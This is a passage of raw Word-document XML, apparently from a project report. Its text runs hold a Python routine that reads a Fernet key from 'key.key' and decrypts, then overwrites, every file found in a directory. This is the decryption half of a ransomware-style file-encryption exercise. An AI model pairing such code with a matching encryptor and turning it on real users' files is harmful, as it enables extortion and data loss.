              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>os.path.join</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>dir,pattern</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">))) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6145E063" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="237" w:lineRule="auto"/>
              <w:ind w:right="4113"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">"Files found in system: ") for file in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>all_files</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">:     print(file) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50BE308C" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B594AFE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">import </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>os</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">, sys </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B9ECDD7" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:right="2780"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>cryptography.fernet</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> import Fernet with open("</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>key.key</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>", "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>rb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">") as </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>thekey</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F97B52" w14:paraId="1A1ACAB5" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="3092"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="052ABC22" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="2" w:line="237" w:lineRule="auto"/>
              <w:ind w:right="2908"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">    code = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>thekey.read</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">() for file in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>all_files</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>:     try:         with open(file, "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>rb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">") as </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>enc_file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="538014D4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">            contents = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>enc_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>file.read</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">() </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73ABF6DC" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="237" w:lineRule="auto"/>
              <w:ind w:right="1580"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>raw_contents</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> = Fernet(code</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>).decrypt</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>(contents)         with open(file, "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>wb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">") as </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>enc_file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">:             </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>enc_file.write</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>raw_contents</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">)     except:         print("{} not </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>decrypted".format</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">(file))         pass </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="272A3AB4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">"Files decrypted successfully...") </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="10DF47E4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="14"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D5A9E7" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="8163"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE3E5F8" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251723776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0438DF35" wp14:editId="14D7947A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="45412" name="Group 4541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00" name="Shape 500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01" name="Shape 500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02" name="Shape 500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03" name="Shape 500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04" name="Shape 500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12" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 50005" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50006" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 50007" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50008" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 5000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2D67C3D8" wp14:editId="00D0FFCD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="45413" name="Group 4541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10" name="Shape 500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11" name="Shape 500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12" name="Shape 500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13" name="Shape 500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14" name="Shape 500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13" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 50015" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50016" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 50017" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50018" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 5001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rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FA603D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="21"/>
        <w:ind w:left="360" w:right="-60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CF21624" wp14:editId="1E48458A">
                <wp:extent cx="5945417" cy="3292198"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="45410" name="Group 45410"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5945417" cy="3292198"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5945417" cy="3292198"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="5645" name="Rectangle 5645"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="677843" cy="182561"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5B1B2948" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                </w:rPr>
                                <w:t xml:space="preserve">Output: </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="5646" name="Rectangle 5646"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="508965" y="0"/>
                            <a:ext cx="51095" cy="182561"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="26113C95" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="5647" name="Rectangle 5647"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="185927"/>
                            <a:ext cx="3484689" cy="182561"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0AD871B1" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:b/>
                                </w:rPr>
                                <w:t>Data used from Database in the website</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="5648" name="Rectangle 5648"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2620086" y="185927"/>
                            <a:ext cx="51467" cy="182561"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="68BF97A7" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:b/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="5649" name="Rectangle 5649"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5906720" y="3154934"/>
                            <a:ext cx="51468" cy="182561"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="75274C90" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:b/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="5659" name="Picture 5659"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId113"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="19253" y="341977"/>
                            <a:ext cx="5873750" cy="2890520"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="5660" name="Shape 5660"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="14491" y="337279"/>
                            <a:ext cx="5883275" cy="2900045"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5883275" h="2900045">
                                <a:moveTo>
                                  <a:pt x="0" y="2900045"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5883275" y="2900045"/>
                                </a:lnTo>
                                <a:lnTo>
